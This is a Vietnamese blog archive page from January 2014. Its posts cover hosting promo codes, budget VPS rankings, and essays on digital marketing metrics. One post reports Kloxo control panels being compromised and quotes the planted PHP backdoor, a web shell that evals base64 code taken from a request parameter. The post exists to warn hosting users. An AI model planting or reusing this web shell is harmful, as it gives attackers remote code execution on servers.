Thứ Sáu, 31 tháng 1, 2014

Namecheap MoveYourDomain Day 2014: Tranfer domain chỉ với 3.98 USD

Namecheap MoveYourDomain Day 2014 được ấn định là ngày 05.2.2014 (từ 00:00 AM đến 11:59 PM giờ EST). Trong ngày này, khi sử dụng mã khuyến mãi do Namecheap cung cấp bạn chỉ phải trả 3.98 USD/năm (chưa bao gồm phí ICCAN 0.98 USD/năm) khi chuyển tên miền từ các nhà cung cấp khác về Namecheap.



Mã khuyến mãi: NCMYDD


Ngoài ra, trong thời gian nêu trên với mã khuyến mãi OSTWITHNC bạn cũng được giảm 75% giá khi mua hosting của Namecheap,



Lưu ý:


  • Giới hạn 50 domain tranfer đối với một tài khoản Namecheap.

  • Mã khuyến mãi không có tác dụng đối với các domain trước đó đã được chuyển đi khỏi Namecheap.

  • Ngoài khuyến mãi trên, bạn còn được miễn phí 1 năm sử dụng WhoisGuard


Đến trang chủ của Namecheap





Nguồn: Namecheap MoveYourDomain Day 2014: Tranfer domain chỉ với 3.98 USD

Thứ Ba, 28 tháng 1, 2014

Kloxo CP dính lỗi bảo mật nghiêm trọng, nhiều nhà cung cấp đã cấm dùng

Kloxo Control Panel là một hosting Control Panel miễn phí được rất nhiều người sử dụng. Tuy nhiên, mới đây có nhiều thông tin cho thấy Kloxo dính lỗi bảo mật rất nghiêm trọng.


We had been considering dropping the Kloxo “Host In A Box” template anyway, since it hasn’t been updated for 2+ years, but now the final nail has been driven into the coffin.


Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into  ./home/kloxo/httpd/default/, which is the ‘default’ site accessible by IP address.


UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=


This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E=):



<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST["8ba7afbaaddc67de33a3f"])!=NULL)eval(base64_decode($_REQUEST["8ba7afbaaddc67de33a3f"]));
elseecho "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >";
?>


Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.


All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn’t have rDNS)


Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We’ve had 4 instances this morning, and it’s effected Ramnode, if not others. Beware!

Nguồn: https://vpsboard.com/topic/3384-kloxo-installations-compromised/


 Ramnode thì cho rằng, Kloxo là nguyên nhân gây ra tình trạng quá tải CPU trên các hệ thống OpenVZ của họ.


Update 2: Kloxo users - http://www.webhostingtalk.com/showthread.php?t=1344003 . We are having to shutdown/suspend your VPSs due to the massive CPU load spikes and network traffic the exploit is generating. You can also read more here:https://vpsboard.com/topic/3384-kloxo-installations-compromised/


Update 3: Due to the severity of the exploit and high potential for further exploits, we have added Kloxo to our prohibited uses in the AUP. You will need to wipe your installation and use a different panel going forward


Hiện nhiều nhà cung cấp dịch vụ VPS, server như Ramnode, INIZ …đã cấm dùng Kloxo trên hệ thống của họ. Ramnode khuyến cáo người dùng sử dụng VestaCP, một hosting control miễn phí khác để thay thế.




Nguồn: Kloxo CP dính lỗi bảo mật nghiêm trọng, nhiều nhà cung cấp đã cấm dùng

Thứ Bảy, 25 tháng 1, 2014

Top 10 nhà cung cấp dịch vụ VPS giá rẻ tốt nhất từ năm 2012 đến nay

Từ quý 2/2012, mỗi quý một lần, website chuyên giới thiệu dịch vụ VPS giá rẻ (budget VPS) LowEndBox tổ chức cho thành viên bình chọn dịch vụ VPS tốt nhất. Nguyên tắc bình chọn là người bình chọn tự đề cử và chấm điểm. Đến nay đã trải qua 7 lần bình chọn.  Dưới đây là top 10 nhà cung cấp dịch vụ VPS giá rẻ được thành viên LEB đánh giá cao nhất qua các lần bình chọn.


Năm 2012







Quý 2/2012


1. Buyvm


2. Prometeus


3. Hostigation


4. Edis


5. ChicagoVPS


6. Ramhost.us


7. SecureDragon


8. Inceptionhosting


9. BlueVM


10. MiniVPS


Quý 3/2012


1. Prometeus


2. Hostigation


3. BuyVM


4. RamNode


5. EDIS


6. ChicagoVPS


7. SecureDragon


8. SemoWeb


9. ProviderService


10. LFCVPS


Quý 4/2012


1. Prometeus


2. BuyVM


3. Ramnode


4. Hostigation


5. EDIS


6. IPXcore


7. ServerDragon


8. Front Range Hosting


9. Chicagovps


10. ProviderService


Năm 2013








Quý 1/2013


1. Prometeus


2. RamNode


3. BuyVM


4. Hostigation


5. EDIS


6. IPXcore


7. FrontRangeHosting


8. ServerDragon


9. BlueVM


10. NodeDeploy


Quý 2/2013


1. RamNode


2. Prometeus / IPerWeb


3. BuyVM


4. Hostigation


5. EDIS


6. DigitalOcean


7. BlueVM


8. FlipHost


9. TorqHost


10. Backupsy


Quý 3/2013


1. Ramnode


2. Prometeus


3. INIZ


4. BuyVM


5. DigitalOcean


6. Backupsy


7. BlueVM


8. EDIS


9. Inceptionhosting


0. Hostigation


Quý 4/2013


1. RamNode


2. Prometeus


3. INIZ


4. Backupsy


5. BuyVM


6. Crissic Solutions


7. Inception Hosting 8. Digital Ocean


9. We Love Servers


10. QuickPacket


 




Nguồn: Top 10 nhà cung cấp dịch vụ VPS giá rẻ tốt nhất từ năm 2012 đến nay

Top 10 nhà cung cấp VPS giá rẻ tốt nhất quý IV/2013

Dựa trên bình chọn của người dùng, website LowEndBox (LEB) vừa công bố danh sách 10 nhà cung cấp dịch vụ VPS giá rẻ (budget VPS) tốt nhất trong quý IV/2013. 3 vị trí dẫn đầu của bảng xếp hạng là Ramnode, PrometeusIniz. Đây là những cái tên quen thuộc trong bảng vàng của LEB trong nhiều quý trở lại đây. Kết quả bình chọn này là một sự tham khảo tuyệt vời nếu bạn đang tìm hiểu để lựa chọn một dịch vụ VPS giá rẻ có chất lượng tốt, phù hợp với nhu cầu công việc.


Top 10 nhà cung cấp VPS giá rẻ tốt nhất quý IV/2013


1. RamNode (243 điểm)


RamNode đã có mặt trong top 3 nhà cung cấp dịch vụ VPS giá rẻ tốt nhất của LEB 4 lần liên tiếp, trong đó hai lần bình chọn mới nhất, Ramnode đứng đầu bảng xếp hạng. Với Ramnode, bạn có thể lựa chọn để sử dụng VPS ảo hóa trên nền tảng OpenVZ hoặc KVM, sử dụng ổ cứng SSD hoặc SSD-Cache. DanhGiaHost đã có bài giới thiệu về dịch vụ VPS của Ramnode, mời các bạn xem tại đây.


Ngoài chất lượng dịch vụ tốt, Ramnode còn thường xuyên có các mã khuyến mãi giảm giá trọn đời với mức giảm khá lớn. Trong dịp này, bạn có thể sử dụng coupon SOMUCHLOVE dể được giảm 42% giá trọn đời.


2. Prometeus (154 điểm)


Prometeus cung cấp dịch vụ VPS từ năm 1997. VPS của họ được ảo hóa trên nền tảng Xen và KVM. Trong 7 lần LEB tổ chức bình chọn thì họ đều có mặt trong top 3 nhà cung cấp dịch vụ tốt nhất. Mới đây, họ cho ra mắt dịch vụ Xen Power với các gói VPS giá rất tốt. Các bạn có thể dùng thử dịch vụ của họ qua gói dịch vụ dưới đây:


1GB RAM
2 vCPU
50GB SSD disk space
2TB bandwidth
1Gbps uplink
1x IPv4 address
2x IPv6 address (free /64 on request)
Xen/SolusVM
Coupon code: LEB4Q13
Price with coupon: €4.76 | $6.44 / month
Order in Milan, Italy
Valid up to January 31

3. INIZ (63 điểm)


INIZ cung cấp dịch vụ VPS ảo hóa trên nền tảng OpenVZ và KVM. Ưu điểm của họ là sự ổn định và hỗ trợ tốt. Hạn chế lớn nhất là họ không bán các gói dịch vụ có tài nguyên lớn (lớn nhất chỉ là 2Gb RAM), do đó khách hàng sẽ không có nhiều lựa chọn. Hiện tôi vẫn đang dùng một gói dịch vụ của họ và không có bất cứ phàn nàn gì. Các bạn có thể dùng thử gói dịch vụ dưới đây để tự mình đánh giá:


2GB RAM
1GB vSwap
4 vCPU cores
75GB disk Space
1500GB bandwidth
1Gbps uplink
2x IPv4 in NYC/LA
1x IPv4 in AMS
$7/month or $42.63/year
Order in New York City
Order in Los Angeles
Order in Amsterdam

4. Backupsy & Co. (54 điểm)


Backupsy khởi đầu là cung cấp VPS giá rẻ dùng để backup dữ liệu. Dịch vụ của họ được đánh giá là tốt nhất trong các nhà cung cấp dạng VPS này. Gần đây, họ giớ thiệu thương hiệu VPSDime, cung cấp dịch vụ VPS có dung lượng RAM lớn, giá rẻ. Về VPSDime, tôi đã giới thiệu tại bài viết này.


Các bạn có thể dùng thử các gói dịch vụ của Backupsy dưới đây:


Backup VPS


512MB RAM
500GB Disk Space
1 vCPU
2TB Traffic
1Gbps Uplink
1 IP Address
KVM
$7.00/month
Coupon code: LEBJAN500
Order

VPSDime


6GB RAM
4 CPU Cores
60GB disk space
2TB bandwidth
1Gbps uplink
1x IPv4 address
OpenVZ/Custom
$7/Month
Order here

 5. BuyVM (40 điểm)


BuyVM cũng là một nhà cung cấp VPS giá rẻ được đánh giá cao. Họ lọt vào top 10 trong cả 7 lần bình chọn. Tôi chưa dùng thử dịch vụ của họ do giá của họ cao hơn các nhà cung cấp khác. Các bạn có thể tự mình đánh giá chất lượng dịch vụ của BuyVM qua gói dịch vụ dưới đây.


512MB RAM
512MB vSwap
50GB disk space
2TB bandwidth
1Gbps uplink
1x IPv4 address
/64 IPv6
OpenVZ/Custom
$5.95/month
Order in Las Vegas
Order in New Jersey

6. Crissic Solutions (37 điểm)


7. Inception Hosting (32 điểm)


8. Digital Ocean (31 điểm)


  • Xem đánh giá về dịch vụ VPS của DigitalOcean tại đây

  • Hướng dẫn đăng ký tài khoản tại DigitalOcean để nhận 10 USD miễn phí, xem tại đây

9. We Love Servers (27 điểm)


10. QuickPacket (25 điểm)




Nguồn: Top 10 nhà cung cấp VPS giá rẻ tốt nhất quý IV/2013

Thứ Sáu, 24 tháng 1, 2014

Mã khuyến mãi miễn phí 10 USD mới từ DigitalOcean

Vừa kiếm được một vài DigitalOcean mã khuyến mãi miễn phí 10 USD mới, share cho mọi người cùng dùng:


SSDBOX10


SPINMEUP10  (mã này hết hạn vào ngày 28/1/2014)



2014SSD



Đến trang chủ của digitalocean



Chú ý: Xem hướng dẫn đăng ký và nhận 10 USD miễn phí vào tài khoản DigitalOcean tại đây





Nguồn: Mã khuyến mãi miễn phí 10 USD mới từ DigitalOcean

Thứ Hai, 20 tháng 1, 2014

Đo lường hiệu quả của Digital Marketing : từ GRP đến Active View & Active GRP


VÌ SAO ĐO LƯỜNG LẠI QUAN TRỌNG 
Vào những năm 1950, các thương hiệu di chuyển ngân sách một cách chậm chạp vào TV, như họ đã làm với ngành quảng cáo trực tuyến hiện nay

Neal Mohan, Vice President, Display Advertising của Google đã viết trên blog rằng
Một trong những điểm quan trọng làm cho việc di chuyển đó [ngân sách vào TV] nhanh lên đáng kể chính là sự cải thiện về cách đo lường - như rating hay nghiên cứu định định lượng. Khi các thương hiệu thấy được ai là người họ có thể tiếp cận (reach) và cái gì ảnh hưởng tới các chiến dịch đang có, họ đã đi theo phương tiện đó, tạo ra ngành công nghiệp nhiều tỉ đô.. và thời kỳ vàng son của TV đã bắt đầu.
Các nhà tiếp thị hiểu rằng thước đo cho các hoạt động quảng cáo của họ trên online -số click - hay trên Facebook - số like - không hiệu quả trong việc đo lường mức độ ảnh hưởng như cách đo lường truyền thống như:
  • Brand lift : mức độ ảnh hưởng của một chiến dịch quảng cáo lên các yếu tố như độ nhận biết thương hiệu (brand awareness), mức độ yêu thích thương hiệu (brand favorability). 
  • Purchase intent : Gia tăng nhu cầu mua sản phẩm sau chiến dịch quảng cáo
  • Gross Rating Point (GRP): các thương hiệu đã nhiều thập kỷ sử dụng GRP để đo lường độ lớn của khán giả xem quảng cáo. 
Quảng cáo trực tuyến chưa thể có một thước đo về khán giả tương tự như GRP. Đó là một lý do khiến các thương hiệu lớn tiếp tục chi tiền quảng cáo trên TV trong khi người dùng dành thời gian ngày một nhiều trên internet.

Online Brand Advertising Outlook 2013 - CMO Council

GROSS RATING POINT (GRP) LÀ GÌ?

Gross Rating Point là trái tim của của đo lường offline media.

GRP là chỉ số cho biết số lượng khán giả, độ lớn của khán giả có thể tiếp cận được do một phương tiện truyền thông cụ thể, trong một khoảng thời gian nhất định.

GRPs được tính như sau : GRP= Reach x Frequency x 100 
  • Reach:  đối tượng mục tiêu /  tổng dân số
  • Average frequency : số lần tiếp cận, hoặc số lần quảng cáo được phát
Ví dụ : một chiến dịch quảng cáo được phát (aired) 4 lần cho đối tượng là 100k người trưởng thành ở Hồ Chí Minh. Tại Hồ Chí Minh có khoảng 4 triệu người trưởng thành thì GRP sẽ là:
GRP= 4 x (100,000/4,000,000) x 100 = 10

Whitepaper chi tiết về GRP:

Nguồn: adrants.com

Suy nghĩ một cách logic chúng ta sẽ thấy bức tranh: ngân sách quảng cáo trực tuyến sẽ tăng khi các nhà quảng cáo (advertiser), các công ty quảng cáo (agency) có thể đo lường những gì họ trả tiền trong thế giới online tương tự như cách mà họ đã đo lường cho TV - mức độ tiếp cận và tần xuất (reach-and-frequency metric).

Đó là lý do trong những năm vừa qua Nielsen mang cách đo lường từ TV áp dụng cho online, ComScore tạo ra thước đo vGRP.

Như mọi "tay to" có mặt trong thời đại truyền thông trực tuyến (online media) như Facebook, các ad networks, Google cũng muốn có phần miếng bánh trị giá 200 tỉ USD được đã chi bởi các thương hiệu trên TV. Họ muốn các nhà tiếp thị gia tăng ngân sách cho online, lĩnh vực mà Google đang thống trị. Họ hiểu nằng nếu có một thước đo phù hợp, Google sẽ thu hút nhiều khách hàng đang quảng cáo từ TV.

Neal Mohan cho biết: "Mục tiêu là càng làm cho việc [quảng cáo] đó dễ dàng bao nhiêu thì càng nhiều thương hiệu chi tiền cho online. Một trong những cơ hội lớn nhất để phá vỡ các điểm mấu chốt liên quan đến việc quảng cáo chính là đo lường".

Theo ông, có một chỉ số đáng tin cậy sẽ giúp cho gia tăng quảng cáo trực tuyến. Không giống như các công ty digital-media như AOL -  hợp tác với các tổ chức đo lường để cung cấp các chỉ số đo lường - Google muốn tự tạo ra cách thức để đo lường GRP dựa trên các dữ liệu được tổng hợp  và từ dữ liệu người dùng nặc danh (anonymized user data).

Google nói rằng họ đang chạy thử nghiệm với khách hàng của DoubleClick for Advertiser. Website của Google cho biết là hiện chỉ có tại thị trường US, Vietnam chắc từ từ mới có.

HAI CHỈ SỐ CHO ONLINE: ACTIVE VIEW & ACTIVE GRP


Hai chỉ số đo lường: 
  1. Active View được Interactive Advertising Bureau định nghĩa : đã được xem - viewable. Định nghĩa này cho rằng 50% các quảng cáo có thể được nhìn thấy trên màn hình được dừng lại trong khi đọc ít nhất là 1 giây. Trên lý thuyết, điều ngày nghĩa là các nhà quảng cáo có thể chọn lựa chỉ trả tiền cho các quảng cáo có khả năng được nhìn thấy. Active View sẽ sẽ xuất hiện trên Google Display Network và sẽ sớm xuất hiện trên DoubleClick. Google nói rằng họ sẽ làm việc với IAB để chuẩn hóa cách tiếp cận này. Active View sẽ cho phép nhà quảng cáo khi nào và ở đâu các quảng cáo của họ được tính, và  quan trọng hơn mỗi quảng cáo xuất hiện trên màn hình trong bao lâu (available on-screen). 
  2. Active GRP: là chỉ số mới của GRP dành cho web. Active GRP có 2 thuộc tính quan trọng
  • Build-in: Active GRP được tích hợp sẵn vào các công cụ  dành cho publisher và các nhà quảng cáo dùng hàng ngày. Active GRP sẽ giúp các quyết định ở mức độ real-time, cho phép nhà quảng cáo điều chỉnh chiến dịch của họ cùng với tốc độ của web.
  • Robust methology: Active GRP được tính toán bởi các mô hình thống kê, tổng hợp từ các dữ liệu khác nhau, kể các các dữ liệu từ người dùng nặc danh. 
Công thức đo phải trải qua vài bước tính toán
  1. Active Audience Ratio = Target demographic online ÷ Population online
  2. Active Opportunity to See (Active OTS) = Impressions in target demographic  + ( Remaining impressions x Active Audience Ratio (%) )
  3. Active GRP (%) = 100 x Active OTS ÷ Target Demographic 
Mohan cho biết các chỉ số mới của Google sẽ được áp dụng cho mọi hình thức quảng cáo trực truyến: traditional display, video and mobile.  Với sự giúp đỡ của liên minh IAB’s Making Measurement Make Sense, Google hy vọng họ tạo ra và được sự chấp nhận rộng rãi về các chỉ số này trong ngành quảng cáo.

GOOGLE CÓ CUNG CẤP ĐƯỢC SỐ LIỆU TẠI VIỆT NAM?
Như công thức tính tóan về Active GRP phía trên cho thấy, bạn cần có vài số liệu mà e rằng các ít có đơn vị nào có được

Population online
Việt Nam khỏang 30 triệu người online, với tầm độ phủ này Google sites + GDN phủ 92.30% - theo số liệu mới nhất của Comscore. Vài công ty có khả năng cạnh tranh là : Facebook - 72.80%, Zing - 78.60%.  

Sở hữu khả năng reach lớn nhất tại Việt Nam hiện nay chính là Google với hệ thống GDN rộng khắp, các thiết bị Android online ngày một lớn, số lượng người sử dụng các dịch vụ của Google như Gmail, Map, Google Search.. trên desktop lẫn mobile đã được Google hợp nhất bằng Google Plus trong những năm qua đã giúp họ có một lượng dữ liệu lớn cho cuộc chiến ID.

Google đã có số liệu demographic khi bạn chạy Remarketing  - Bấm vào hình để xem chi tiết

Không chỉ vậy, khi bạn chọn đối tượng quảng cáo, bạn có thể mở rộng các người xem có demographic tương tự. Hãy tưởng tượng bạn chỉ quảng cáo cho đối tượng là các khách hàng đã mua hàng của bạn, trên website của bạn. Không chỉ dừng ở đó, bạn còn có thể tiếp cận đến những đối tượng tương tự như thế, một tập khách hàng tiềm năng lớn hơn rất nhiều.

Ví dụ bên dưới là từ tập người dùng mẫn 1.800 visitors từ website của chính mình, bạn có thể mở rộng khả năng tiếp cận đến 1,2 triệu người.

Khi bạn chọn đối tượng để quảng cáo, bạn hòan tòan có thể mở rộng được

Target demographic
Facebook có dữ liệu tốt nhất về mảng này, Google đang dần dần có được các số liệu tham chiếu từ nhiều nguồn khác nhau. Với các đơn vị trong nước, tôi chưa biết đơn vị nào có khả năng cung cấp số liệu này ngoài việc lấy dữ liệu từ Comscore hoặc làm online survey để gửi cho khách hàng tham khảo. 

Liệu Zing, Webtretho, Eva hay Dân Trí có trả lời được cho bạn: đợt chạy banner lần này, bạn có thể reach được xx% đối tượng mục tiêu (target audience)? E rằng họ không thể trả lời điều đó trong tương lai gần. Với dữ liệu hiện tại, theo tôi  chỉ còn Facebook và Google có đủ khả năng. 

Impressions in target demographic

Mỗi chiến dịch quảng cáo trên online có thể tiếp cận được bao nhiêu phần trăm đối tượng mục tiêu? Hay dễ hiểu hơn: làm thế nào để đo lường một quảng cáo xuất hiện trước bao nhiêu người, thay vì số lượng impression và số click như cách các bạn làm digital marketing vẫn mua từ các publisher?

Chúng ta sẽ cùng chờ xem những update kế tiếp và khi nào chúng ta có thể sử dụng các chỉ số này trong các kế họach marketing của mình. Hai chỉ số này liệu có thể làm nên cách mạng? Tương lai sẽ cho chúng ta biết.

Update Feb 6, 2014: Chỉ số Active View đã xuất hiện trên Google Adwords Việt Nam

Giải thích về Active View trên Google Adwords

Config để nhìn thấy số liệu

Config campaign - hình ảnh từ :  phillymarketinglabs

Thứ Ba, 7 tháng 1, 2014

Digital Marketing Mix : Product & Price của 4Ps

Có thể là một sự trùng hợp thú vị, cuối năm trước tôi có dịp làm diễn giả của buổi offline “SEO 2013: Định hưởng để thành công"  với chủ đề  “Future of Digital” - cầu nối giữa Digital Marketing với SEO, năm nay tôi lại tiếp tục làm cầu nối giữa Digital Marketing với cộng đồng IT Leader Club.


Tôi trích nội dung đã trình bày về 2 yếu tố căn bản nhất trong Digital Marketing Mix là Product & Price để giúp các bạn hiểu thêm về digital marketing cũng như việc vận dụng thực tế 4Ps trong thế giới digital.

DIGITAL WORLD



Một thống kê từ BI cho chúng ta thấy có gần 3 tỉ người online, chiếm chưa đầy một nửa so với dân số trên thế giới - vốn có hơn 7 tỉ người. So với tỉ lệ này, Việt Nam có khoảng 30 triệu người online, chiếm 35% dân số là một con số lạc quan.

Tỉ lệ này thấp hơn so với Trung Quốc - chiếm 42% dân số và cao hơn nhiều so với con số 1,1% của Myanma và 4,9% của Cambodia.

Đến cuối tháng 10/2013, giá trị các công ty là đại gia mà hầu hết chúng ta đều biết như Time Wanrner, Disney, 21st Century Fox.. thấp hơn giá trị của Google và Apple cộng lại.

Google, với hơn 95% doanh thu đến từ quảng cáo trực tuyến định vị mình là công ty “trên đám mây” cho chúng ta thấy tầm quan trọng của quảng cáo trực tuyến, của thế giới digital marketing đang hiện hữu xung quanh chúng ta.

DIGITAL MARKETING LÀ GÌ?

Vậy thế giới digital marketing đó là gì? Chúng ta hãy bắt đầu bằng điều cơ bản nhất, câu chuyện trước khi có internet, trước khi có khái niệm digital marketing: theo bạn marketing là gì?

Nếu bạn Google từ khóa này, bạn sẽ tìm thấy rất rất nhiều câu trả lời khác nhau. Tuy nhiên, về cốt lõi, marketing = market + ing. Làm thế nào để đưa sản phẩm ra thị trường. Chấm hết.

Nếu bạn muốn làm một website thương mại điện tử hay có ý định làm một ứng dụng trên di động, bạn sẽ bắt đầu như thế nào? Với nhiều chuyên gia về công nghệ hay lập trình viên chuyên nghiệp, cài đặt một website Magento không phải là vấn đề lớn với các bạn. Nhưng sau khi cài đặt xong thì làm thế nào để đưa sản phẩm ra thị trường, làm sao để thành công.

Nếu chỉ có riêng về kỹ thuật, có lẽ đội ngũ của VNG đủ giỏi để duy trì được Zing Deal. VNG không duy trì Zing Deal không phải vì kỹ thuật họ không thể đáp ứng. Project Lana tái tập trung vào Bé Yêu không phải vì đội ngũ kỹ thuật không thể đáp ứng nhiều dự án hơn.

Điều gì đã làm các sản phẩm này thành công và sản phẩm kia thất bại? Tech có vẻ như không phải là nguyên nhân chủ yếu của các sự kiện kể trên. Bài học về cốt lõi của Marketing Mix trong thời đại digital có lẽ sẽ không bao giờ cũ!

P1:  PRODUCT


Từ bao giờ Zing Me trở thành cổng game ? Xuất phát điểm là tham vọng muốn xây dựng một mạng xã hội cho Việt Nam, nhưng sau mấy năm chiến đấu với Facebook, Zing Me đã biến thành mạng xã hội dành cho cộng đồng game thủ. Game Over cho tham vọng mạng xã hội nhưng lại là một khởi đầu tốt cho một định vị mới.

Hãy xem lại tham vọng của Zing Me bằng bài viết cách đây 4 năm, với phát biểu của Vương Quang Khải, phó tổng VNG : “Các mạng xã hội thế hệ thứ ba (mà Zing Me và Facebook là hai đại diện) đều không có sự khác biệt quá lớn. Sản phẩm mới ra đời không có nghĩa là phải phủ nhận cái cũ, mà quan trọng là cải tiến cái cũ, đưa ra được những giá trị mới phù hợp hơn. Facebook khi mới ra đời chỉ là một bản sao của mạng xã hội Friendster nhưng do có một số tính năng mới thuận tiện hơn nên đã được người dùng đón nhận nhiệt tình

Niềm tin vào một sản phẩm tốt hơn sẽ dành chiến thắng đang mang lại lửa cho đội ngũ của Zing Me, vào thời điểm mà keyword “mạng xã hội” nóng hơn bao giờ hết. Tốt hơn sẽ có thị phần nhiều hơn? E rằng không.

Và đây là mục tiêu mới của VNG

Nguồn: Zing
Bạn có chắc một chiếc đồng hồ Rolex, trị giá khoảng 2 tỉ sẽ chạy chính xác hơn đồng hồ điện tử Casio giá 300 USD? Bạn có biết trong cuộc thử mù giữa Pepsi và Coke, sản phẩm nào được người dùng ưa thích hơn không?

Với mạng xã hội, khi Zing Me chỉ là một follower của Facebook, với nhiều cải tiến hơn nhưng không thể cung cấp được các liên kết ra bên ngoài Việt Nam đã bị Facebook chiếm hữu. Facebook sở hữu từ “connection” - giúp chúng ta kết nối và duy trì các mối quan hệ mỏng manh.

Khi lượng người dùng của Facebook đủ lớn, ảnh hưởng bởi “network effects”: giá trị của một mạng xã hội hoặc một sản phẩm dịch vụ phụ thuộc vào việc có bao nhiêu người đang dùng nó. Facebook, Skype, điện thoại di động, các ứng dụng OTT như Viber, Line, Zalo là một số ví dụ. Càng có nhiều người dùng mới thì người đang ở bên trong network sẽ càng nhận được nhiều giá trị, đồng thời network càng lớn thì người mới tham gia cũng nhận được nhiều giá trị hơn. 

Nói một cách dễ hiểu, nếu có quá ít người dùng Viber, cài đặt xong bạn sẽ gọi cho ai? 

Những người dùng mới sẽ tham gia vào mạng xã hội mang lại cho họ nhiều giá trị hơn. Vào thời điểm đó, Facebook đang là số 1 toàn cầu và đã có kịp 2 triệu người Việt Nam kết nối. Trong khi đó Zing Me dựa trên cộng đồng game thủ hơn 8 triệu người, nhưng lại không có kết nối với nhau, không có tương tác chất lượng nên người dùng tham gia vào Facebook và ngoảnh mặt với Zing Me. Không quá khó để nhận thấy Zing Me đang là một sản phẩm đuổi theo. 

Với cùng câu hỏi, chúng ta sẽ đặt ra với Anphabe, một sản phẩm clone của LinkedIn, liệu họ có thành công? 

P2. PRICE

Trong cuộc đua về mạng xã hội, để đuổi kịp và vượt qua Facebook là một câu hỏi lớn. Tuy nhiên bạn không nhất thiết phải là người theo đuôi (follower).  Bạn có thể cung cấp cấp một giá trị hoàn toàn khác, nếu không muốn nói là ngược lại, bạn sẽ ghi dấu ấn của mình trong tâm trí người dùng. Snapchat, công ty từ chối đề nghị mua lại với giá 3 tỉ USD tiền mặt từ Facebook là một ví dụ.


Snapchat đã mang lại giá trị gì khác với Facebook, khiến cho người dùng upload hình ảnh nhiều hơn cả Facebook, mạng xã hội có hơn 1 tỉ người? Mỗi ngày, trung bình có 400 triệu hình ảnh và video được gửi qua Snapchat, bằng Facebook và Intagram cộng lại. 

Facebook được định vị là timeline, phản ánh con người thật của bạn trong cuộc sống, bạn là người thật. Những gì bạn post trên đó sẽ tồn tại mãi mãi. Snapchat cung cấp giá trị ngược lại: những gì bạn upload chỉ là tạm thời - temporary social media - chỉ tồn tại trong 10 giây ngắn ngủi. Những hình ảnh video bị xóa bỏ hoàn toàn, tránh rủi ro người gửi bị ảnh hưởng sau này - những giây phút mà sau đó người ta chỉ muốn quên đi hoặc những hình ảnh sợ bị bố mẹ phát hiện.

Về kỹ thuật, những gì Snapchat làm được, chúng ta có thể làm được, nhưng giá trị mà Snapchat mang lại, trải nghiệm mà họ mang lại không chỉ thuần túy là kỹ thuật mà là mức độ hiểu sâu về thói quen người dùng, là tầm nhìn về khoảng trống thị trường.

Vậy còn Webtretho thì sao? Liệu WTT có thành công? Hãy cùng xem các chủ đề được chia sẻ trên WTT: chuyện "thắc mắc về lần đầu quan hệ", chuyện "nhật ký đêm tân hôn", chuyện "đời sống tình dục của vợ chồng"..


Trong buổi offline, rất nhiều bạn đã cười khi tôi đọc các số chủ đề này. Nhiều bạn có thể chưa biết Webtretho có những chủ đề này.  Liệu chúng ta có dám trao đổi tâm sự thầm kín, chuyện giường chiếu, chuyện chính họ đang ngoại tình, những ray rứt, những tổn thương.. bằng Facebook? Chắc chắn là không.

Webtretho cung cấp giá trị ở một góc mới, khác với Snapchat. Ở đó là bạn có thể không phải người thật, nơi bạn có thể tâm sự với một nick name mà không ai biết bạn. Ở vai trò là Product Manager của mục Tâm sự, tôi phải đọc rất nhiều bài để hiểu được những suy nghĩ sâu kín (customer insight) của người sử dụng. Tôi bắt gặp rất nhiều chủ đề tâm sự bắt đầu với câu : Em là member cũ, nhưng đăng ký nick mới để dễ tâm sự.

Webtretho giống như một ngôi nhà để họ bày tỏ, bộc lộ để được an ủi, tư vấn, để băng bó trái tim đang tan vỡ. Ở Webtretho, họ là vô danh, họ có thể bày tỏ. WTT hoàn toàn trái ngược với Facebook. Đó chính là giá trị và định vị để mang lại giá trị mà Facebook không thể nào làm được. Nếu Facebook cũng tập trung vào giá trị này họ sẽ ra khỏi giá trị cốt lõi của chính họ.

Marketing thường bắt đầu bằng cách tìm kiếm các khoảng trống trong thị trường và đáp ứng các các nhu cầu đó. Khi công nghệ bắt đầu từ nhu cầu của người dùng, bạn sẽ được tưởng thưởng xứng đáng.

Với các sản phẩm như Snapchat, Webtretho, mức giá cho người sử dụng không phải là họ phải trả bao nhiêu tiền, đơn giản vì các dịch vụ này miễn phí. Mức chi phí ẩn mà họ phải trả cho mỗi sản phẩm gần như nhau: thời gian, chi phí internet, chi phí điện..

Yếu tố Price trong Marketing thường đi đôi với Giá Trị (Value) mà người dùng nhận được. Khi mức chi phí phải trả gần bằng không, các sản phẩm sẽ tập trung vào tập giá trị mà người dùng nhận được khi sử dụng các sản phẩm dịch vụ này. Sản phẩm dịch vụ nào mang lại nhiều giá trị hơn cho người dùng sẽ chiến thắng.

Cũng như một chàng trai mang nhẫn đi cầu hôn một cô gái, nếu chiếc nhẫn của bạn  - sản phẩm của bạn - mang lại giá trị thực sự cho người dùng, giúp cho cuộc sống tốt đẹp hơn, thuận tiện hơn, lời cầu hôn của bạn sẽ được chấp nhận!

Thứ Hai, 6 tháng 1, 2014

Wallpaper Danbo - Bộ hình nền cực cute và độc

Nếu ai đó từng quan tâm thì cũng biết Danbo là những chú rô bốt bìa cứng cực kì dễ thương và mình dám chắc rằng khi nhìn thấy bạn sẽ thích ngay. Bộ hình nền này có điểm đặc biết là các danbo trong hình ảnh biểu hiện cảm xúc giống người thật. Mình chỉ up một vài tấm demo các bạn tải trọn bộ Wallpaper Danbo bên dưới về xem nhá nếu như thích và muốn sưu tầm thêm hình nền danbo hãy like và để lại comments mình sẽ đăng tải thêm vào kì sau.




Bạn có thể download ở đây.

Bộ sưu tập hình nền siêu xe môtô đẹp tuyệt vời.

